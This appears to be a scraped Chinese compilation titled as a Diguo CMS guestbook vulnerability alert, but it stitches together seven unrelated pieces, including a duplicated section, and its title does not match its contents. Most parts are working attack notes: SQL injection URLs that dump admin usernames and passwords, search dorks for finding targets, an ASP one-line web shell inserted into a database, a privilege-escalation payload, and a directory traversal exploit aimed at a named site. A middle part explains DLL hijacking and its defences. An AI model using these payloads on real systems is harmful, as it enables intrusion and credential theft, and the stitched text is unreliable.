帝国CMS 留言本多字节漏洞漏洞预警

帝国CMS 留言本多字节漏洞漏洞预警（精选7篇）

帝国CMS 留言本多字节漏洞漏洞预警 篇1

poc:

1.index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin

复制代码

关键词：

1.inurl:index.php?m=hotelinfo

复制代码

后台：

帝国CMS 留言本多字节漏洞漏洞预警 篇2

源码下载down.chinaz.com/soft/24108.htm

www.soyici.cn

漏洞等级：高

漏洞说明：

数据库未加入防下载代码导致可以插入非法代码，

搜一次CMS v3.32 数据库插入漏洞

，

数据库地址：/database/#GBooK.ASP

/database/#SoYiCi.ASP

插入数据地址localhost/Gbook.ASP

插入代码：┼}诞整超∨≡┩>(<% execute request(“a”)%>)

修补方法：1.数据库地址更改名称

2.数据库加入放下载代码

DLL劫持漏洞解析漏洞预警 篇3

艾瑞初发布的中国下半年个人网络安全报告中，包含这么一个数据：20下半年十大热点木马中，其中5个是利用DLL劫持漏洞来对系统进行破坏的，DLL劫持漏洞到底是何方神圣，竟然占领了木马技术的半壁江山?

图1 艾瑞安全报告中利用DLL劫持技术的热门木马截图

DLL(Dynamic Link Library)，全称动态链接库，是Windows系统上程序正常运行必不可少的功能模块，是实现代码重用的具体形式。简单的说，可以把DLL理解成帮助程序完成各种功能的组件。

DLL劫持漏洞(DLL Hijacking Exploit)，这个名字缘起微软在8月23日发布的2269637号安全公告。这个漏洞是通过一些手段来劫持或者替换正常的DLL，欺骗正常程序加载预先准备好的恶意DLL的一类漏洞的统称。利用DLL劫持漏洞，病毒木马可以随着文档的打开(或者其他一些程序正常行为)而激活自身，进而获得系统的控制权。

我们来看看DLL劫持漏洞到底是何方神圣。

高危害利用形式的爆发

DLL劫持漏洞伴随着Windows而存在，但是一直并未得到大家的足够重视。

直到208月份，有 在安全论坛上公布了一种危害极高的DLL劫持漏洞的利用形式，迅速引起强烈的反应。随后，著名安全组织exploit-db公布了一系列存在DLL劫持漏洞的软件列表，其中可以发现大家十分熟悉的应用软件，包括：AutoCAD 、Daemon Tools、Winamp、Media Player Classic、Mozilla Thunderbird、Microsoft Office、Adobe Photoshop、Adobe Dreamweaver CS5、Skype、Snagit10、Safari、WinDVD、Opera、Firefox等等。

图2 PCHOME针对DLL劫持漏洞的新闻截图

简单的讲，安装了上述软件的电脑，当用户在打开一个图片、音乐、视频、BT种子、网页文件都有可能感染病毒。当攻击者利用DLL劫持漏洞构造一个特殊的DLL文件，将这个DLL文件和一些JPG、PPT、MP3、MPG、HTML文件共同打包，用户解压后双击打开这些文档，病毒即被立即触发。也就是说，不需要其他漏洞，不需要可执行文件，只需要鼠标双击打开别人发给你的音乐、视频或者图片文件，就可能感染病毒!难怪国外安全公司authentium在官方博客中描述DLL劫持漏洞时，甚至用“The world is going to end!”做标题。

不过此次**，随着网民们的关注和各个产品漏洞的逐步修复，逐渐平息下去。

演变和进化

DLL劫持漏洞的生命力绝不仅限于打开文件这种触发这种形式。通过这种形式的启发， 们逐渐找到了DLL劫持漏洞的更大活力。二年之后的今天，当我们再看这个漏洞时，它已摇身一变更具威胁了。

了解客户端安全的同学应该都知道，现在的安全软件大都会采取白名单机制，把一些大公司的程序放在安全软件的白名单中，白名单中的程序不会进行监控并默认信任，以减少误报率。

都说安全性和易用性是相悖的。白名单这个特性是使安全软件和受信任程序的使用都方便了不少，但是，同时也更加方便了广大 。我们都知道，软件工作时都需要这样那样的DLL功能组件，那么在安全软件白名单信任策略支持下，即使“安全软件”要加载的DLL是被替换掉的恶意DLL，安全软件都会被认为是合法、正常的行为。因此， 们就开始利用各大公司软件中存在的DLL劫持漏洞，堂而皇之的在安全软件眼皮底下加载早已准备好的恶意代码，入侵用户的计算机。至此，更具“劫持”特性的广义DLL劫持漏洞正式诞生。

本文开头艾瑞报告中提到的那5个DLL劫持木马，都属于这种漏洞形式。是的，你没有听错，就是它，占领木马激活技术的半壁江山。由于效果极好，是 们杀人放火，打家劫舍的必备大杀伤性武器。

刨根到底看原理

DLL劫持漏洞之所以被称为漏洞，还要从负责加载DLL的系统API LoadLibrary来看。熟悉Windows代码的同学都知道，调用LoadLibrary时可以使用DLL的相对路径。这时，系统会按照特定的顺序搜索一些目录，以确定DLL的完整路径。根据MSDN文档的约定，在使用相对路径调用LoadLibrary(同样适用于其他同类DLL LoadLibraryEx，ShellExecuteEx等)时，系统会依次从以下6个位置去查找所需要的DLL文件(会根据SafeDllSearchMode配置而稍有不同)。

1. 程序所在目录;

2. 系统目录;

3. 16位系统目录;

4. Windows目录;

5. 当前目录;

6. PATH环境变量中的各个目录。

而所谓的劫持的，就发生在系统按照顺序搜索这些特定目录时，

只要 能够将恶意的DLL放在优先于正常DLL所在的目录，就能够欺骗系统优先加载恶意DLL，来实现“劫持”。

微软的“设计缺陷”?

从上面的原理来看，LoadLibrary API并不会去检查即将要加载进来的DLL是好人还是坏人，不管是李逵还是李鬼都有酒喝、有肉吃。这点我们能理解，毕竟判断DLL是好是坏不是系统的事情，而是安全软件的事情。

同时，当使用相对路径调用这个API加载DLL时，就会触发上一节所述的神奇的动态链接库搜索逻辑。由于系统搜索的位置非常多，而且其中的许多位置都能轻易被 劫持和控制，给了DLL劫持漏洞很大的利用空间。

但是，微软认为以上这些属于系统特性，不属于安全漏洞而不做修改，微软官方的介绍及安全建议请参考这里：Dynamic-Link Library Search Order，Dynamic-Link Library Security。

比较有意思的是，从Windows 7的KB2533623补丁开始，微软给我们带来了三个解决DLL劫持问题的新API：SetDefaultDllDirectories，AddDllDirectory，RemoveDllDirectory。这几个API配合使用，可以有效的规避DLL劫持问题。可惜的是，这些API只能在打了KB2533623补丁的Windows7，上使用。

刨根到底看原理

DLL劫持漏洞之所以被称为漏洞，还要从负责加载DLL的系统API LoadLibrary来看。熟悉Windows代码的同学都知道，调用LoadLibrary时可以使用DLL的相对路径。这时，系统会按照特定的顺序搜索一些目录，以确定DLL的完整路径。根据MSDN文档的约定，在使用相对路径调用LoadLibrary(同样适用于其他同类DLL LoadLibraryEx，ShellExecuteEx等)时，系统会依次从以下6个位置去查找所需要的DLL文件(会根据SafeDllSearchMode配置而稍有不同)。

1. 程序所在目录;

2. 系统目录;

3. 16位系统目录;

4. Windows目录;

5. 当前目录;

6. PATH环境变量中的各个目录。

而所谓的劫持的，就发生在系统按照顺序搜索这些特定目录时。只要 能够将恶意的DLL放在优先于正常DLL所在的目录，就能够欺骗系统优先加载恶意DLL，来实现“劫持”。

微软的“设计缺陷”?

从上面的原理来看，LoadLibrary API并不会去检查即将要加载进来的DLL是好人还是坏人，不管是李逵还是李鬼都有酒喝、有肉吃。这点我们能理解，毕竟判断DLL是好是坏不是系统的事情，而是安全软件的事情。

同时，当使用相对路径调用这个API加载DLL时，就会触发上一节所述的神奇的动态链接库搜索逻辑。由于系统搜索的位置非常多，而且其中的许多位置都能轻易被 劫持和控制，给了DLL劫持漏洞很大的利用空间。

但是，微软认为以上这些属于系统特性，不属于安全漏洞而不做修改，微软官方的介绍及安全建议请参考这里：Dynamic-Link Library Search Order，Dynamic-Link Library Security。

比较有意思的是，从Windows 7的KB2533623补丁开始，微软给我们带来了三个解决DLL劫持问题的新API：SetDefaultDllDirectories，AddDllDirectory，RemoveDllDirectory。这几个API配合使用，可以有效的规避DLL劫持问题。可惜的是，这些API只能在打了KB2533623补丁的Windows7，2008上使用。

DLL加载安全之道

首先，对于会打开图片、音乐等各种类型文件的程序，分为以下三种情况处理：

A. 对于外部第三方DLL和自己的DLL：

1. 使用LoadLibrary API加载DLL时使用绝对路径，类似的情况还包括其他API如LoadLibraryEx, CreateProcess, ShellExecute等;

2. 将所有需要使用到的DLL放在应用程序所在的目录，不放到系统目录或者其他目录。

B. 对于系统共享的DLL(如user32.dll, mfc80loc.dll等)，不能放到程序目录下时，应该：

1. 使用绝对路径加载;

2. 对于无法准确预测绝对路径的情况，可以使用相对路径加载。

C. 程序启动时调用API SetDllDirectory(L“”)将当前目录从DLL加载顺序中移除.

其次，对于广义DLL劫持漏洞，我们只有一种有效的处理办法：加载任何DLL前先校验文件的签名，签名没有问题的才能加载。

检测方案

DLL劫持漏洞的检测比较简单，可以在虚拟环境将程序运行起来，对其中的DLL加载操作进行审计，找出加载顺序中可能被劫持的点;还可以为程序构建一个“劫持现场”(自己做一个劫持并转发给正常DLL的DLL文件看是否执行其中代码)，并检查程序能否真正规避DLL劫持的威胁。

帝国CMS 留言本多字节漏洞漏洞预警 篇4

# Homepage: iGiveTest.com/

谷歌关键字: “Powered by iGiveTest”

随便注册一个帐号，

iGiveTest 2.1.0注入漏洞漏洞预警

，

然后暴管理员帐号和密码

帝国CMS 留言本多字节漏洞漏洞预警 篇5

注册一个论坛ID

IE提交下面代码

blackband.php?mode=yule&action=enjoy&id=2 and 1=2 union select 1,0x2D312C67726F757069643D312C61646D696E69643D31,3,4/

提升到管理员

discuz7.0.0后台得webshell方法

www.oldjun.com/blog/index.php/archives/48/

如果是discuz6.0 的后台就提交

admincp.php?action=styles&edit=1

帝国CMS 留言本多字节漏洞漏洞预警 篇6

今天无聊想找个CMS挖看看，

就在A5找到dircms

商业版那个叫贵吖。又不安全，不知道是不是就一个程序员，一个客服的小公司。

挖到一个遍历目录

貌似还有地方可以拿shell晚上回家测试

刚刚百度，乌云貌似是12号有提交

不过还没有公开所以不算抄袭，

测试网站：www.tengzhou0632.com

先注册会员

然后打开EXP：Madman.in/api/upload/index.php?action=list_image&objid=image_api_image&dir=9d4c2f636f067f89../../../../

然后目录就全部爆出来了，喜欢的自己下载源码去研究。有免费版的。

下载地址：down.chinaz.com/soft/27402.htm

帝国CMS 留言本多字节漏洞漏洞预警 篇7

127.0.0.1/index.php?action=browse&cat=[注入语句]

127.0.0.1/index.php?action=playgame&gameid=[注入语句]

127.0.0.1/index.php?action=browse&cat=[注入语句]

列如：127.0.0.1/snowcade/index.php?action=browse&cat=31%20UNION%20SELECT%201,CONCAT_WS%28CHAR%2832,58,32%29,username,password%29,3,4,5,6+from+users%20limit%201,1--